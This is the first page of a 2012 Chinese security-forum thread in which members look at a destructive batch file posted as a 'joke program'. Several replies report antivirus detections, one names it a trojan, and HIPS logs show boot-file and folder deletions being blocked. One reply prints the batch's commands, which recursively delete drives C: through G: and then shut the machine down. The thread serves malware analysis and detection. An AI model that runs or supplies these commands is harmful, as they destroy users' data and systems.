收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 在网上发现一个玩笑程序,很强悍,暂过BD
12345678下一页
返回列表 发新帖
查看: 14388|回复: 73
收起左侧

[可疑文件] 在网上发现一个玩笑程序,很强悍,暂过BD

  [复制链接]
3801187
发表于 2012-8-10 19:13:36 | 显示全部楼层 |阅读模式
本帖最后由 3801187 于 2012-8-23 12:16 编辑

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

会飞的猫
发表于 2012-8-10 19:14:43 | 显示全部楼层
过360,手动hips未测试,LZ是什么行为的呢
回复

举报

3801187
 楼主| 发表于 2012-8-10 19:15:49 | 显示全部楼层
会飞的猫 发表于 2012-8-10 19:14
过360,手动hips未测试,LZ是什么行为的呢

我没有测,不敢呀
回复

举报

苏东旭
发表于 2012-8-10 19:17:59 | 显示全部楼层
kingsoft、ESS  miss
回复

举报

lingbo110120
发表于 2012-8-10 19:18:20 | 显示全部楼层
rmdir /s/q C:\
rmdir /s/q D:\
rmdir /s/q E:\
rmdir /s/q F:\
rmdir /s/q G:\
shutdown -s
回复

举报

会飞的猫
发表于 2012-8-10 19:18:24 | 显示全部楼层
3801187 发表于 2012-8-10 19:15
我没有测,不敢呀

那LZ怎么知道是玩笑程序,等过一会我用hips测一下
回复

举报

Nocria
发表于 2012-8-10 19:18:54 | 显示全部楼层
本帖最后由 humanlwj52 于 2012-8-10 20:21 编辑

To ESET.

Dear Depp,

Thank you for your submission.
The detection for this threat will be included in our next signature update.

Sddate.bat - BAT/Shutdown.NCN trojan

Regards,

ESET Malware Response Team

评分

参与人数 1人气 +1 收起 理由
迷惘的执著 + 1 版区有你更精彩: )

查看全部评分

回复

举报

3801187
 楼主| 发表于 2012-8-10 19:19:13 | 显示全部楼层
会飞的猫 发表于 2012-8-10 19:18
那LZ怎么知道是玩笑程序,等过一会我用hips测一下

我是看别人说的
回复

举报

lingbo110120
发表于 2012-8-10 19:19:25 | 显示全部楼层
会飞的猫 发表于 2012-8-10 19:18
那LZ怎么知道是玩笑程序,等过一会我用hips测一下

这还要测 。。。改TXT就知道了。。。
随便写的批处理、、、
回复

举报

hddu
发表于 2012-8-10 19:20:26 | 显示全部楼层
2012-08-10 19:19:05    修改文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:(隐藏文件)C:\AUTOEXEC.BAT
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->%SystemDrive%\AUTOEXEC.BAT


2012-08-10 19:19:06    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\AUTOEXEC.BAT
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->%SystemDrive%\AUTOEXEC.BAT


2012-08-10 19:19:06    修改文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:(隐藏文件)C:\AUTOEXEC.BAT
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->%SystemDrive%\AUTOEXEC.BAT


2012-08-10 19:19:06    修改文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:(隐藏文件)C:\boot.ini
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->C:\boot.ini


2012-08-10 19:19:06    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\boot.ini
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->C:\boot.ini


2012-08-10 19:19:06    修改文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:(隐藏文件)C:\boot.ini
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->C:\boot.ini


2012-08-10 19:19:06    修改文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:(隐藏文件)C:\bootfont.bin
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->C:\bootfont.bin


2012-08-10 19:19:06    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\bootfont.bin
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->C:\bootfont.bin


2012-08-10 19:19:06    修改文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:(隐藏文件)C:\bootfont.bin
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->C:\bootfont.bin


2012-08-10 19:19:06    修改文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:(隐藏文件)C:\CONFIG.SYS
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->C:\CONFIG.SYS


2012-08-10 19:19:06    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\CONFIG.SYS
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->C:\CONFIG.SYS


2012-08-10 19:19:06    修改文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:(隐藏文件)C:\CONFIG.SYS
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->C:\CONFIG.SYS


2012-08-10 19:19:12    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AFCache
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:15    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\QDR4XGWZ
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:17    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:19    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:21    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Adobe
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:23    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\desktop.ini
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:25    修改文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:(隐藏文件)C:\Documents and Settings\Administrator\Application Data\desktop.ini
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->%SystemDrive%\*


2012-08-10 19:19:28    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Identities\{0B9260BC-9664-4404-9876-9D404E49D049}
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:30    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Identities\{264ADD6E-CE42-4AD6-801E-2ECBE7C4856A}
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:32    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Identities\{72A83FE3-E796-4A97-B2DD-1151A33D4402}
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:34    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Identities\{C1F45325-0CE2-4260-A771-B8A4AC51BA79}
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:36    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Identities\{D0E56061-B854-4D20-9823-AC1233A8E3D8}
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:37    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Identities
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:39    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Kanbox Network\Kanbox\Application\Bin\msvcp90.dll_{0D9B216D-37AD-4203-A7F1-60C8AFCFD42D}.dll
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:42    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Kanbox Network\Kanbox\Application\Bin\msvcr90.dll_{0D9B216D-37AD-4203-A7F1-60C8AFCFD42D}.dll
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:44    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Kanbox Network\Kanbox\Application\Bin\rpt.dll_{0D9B216D-37AD-4203-A7F1-60C8AFCFD42D}.dll
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:46    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Kanbox Network\Kanbox\Application\Bin
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:47    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Kanbox Network\Kanbox\Application\ShellExt\SyncStateExt_{0D9B216D-37AD-4203-A7F1-60C8AFCFD42D}.dll
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:49    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Kanbox Network\Kanbox\Application\ShellExt
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:50    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Kanbox Network\Kanbox\Application
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:54    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Kanbox Network\Kanbox
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:55    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Kanbox Network
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:19:58    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Kingsoft\kvip
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:20:01    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Kingsoft\金山安全沙箱
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:20:03    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Kingsoft
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:20:06    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\LZBWBC2A\a.tbcdn.cn\app\tbskip\lsoSaver.swf\g_lbs.sol
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:20:09    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\LZBWBC2A\a.tbcdn.cn\app\tbskip\lsoSaver.swf\TB_recentViewedItems.sol
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


2012-08-10 19:20:12    删除文件      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\LZBWBC2A\a.tbcdn.cn\app\tbskip\lsoSaver.swf
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\Documents and Settings\*\Application Data\*


回复

举报

下一页 »
12345678下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-9 19:41 , Processed in 0.133615 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表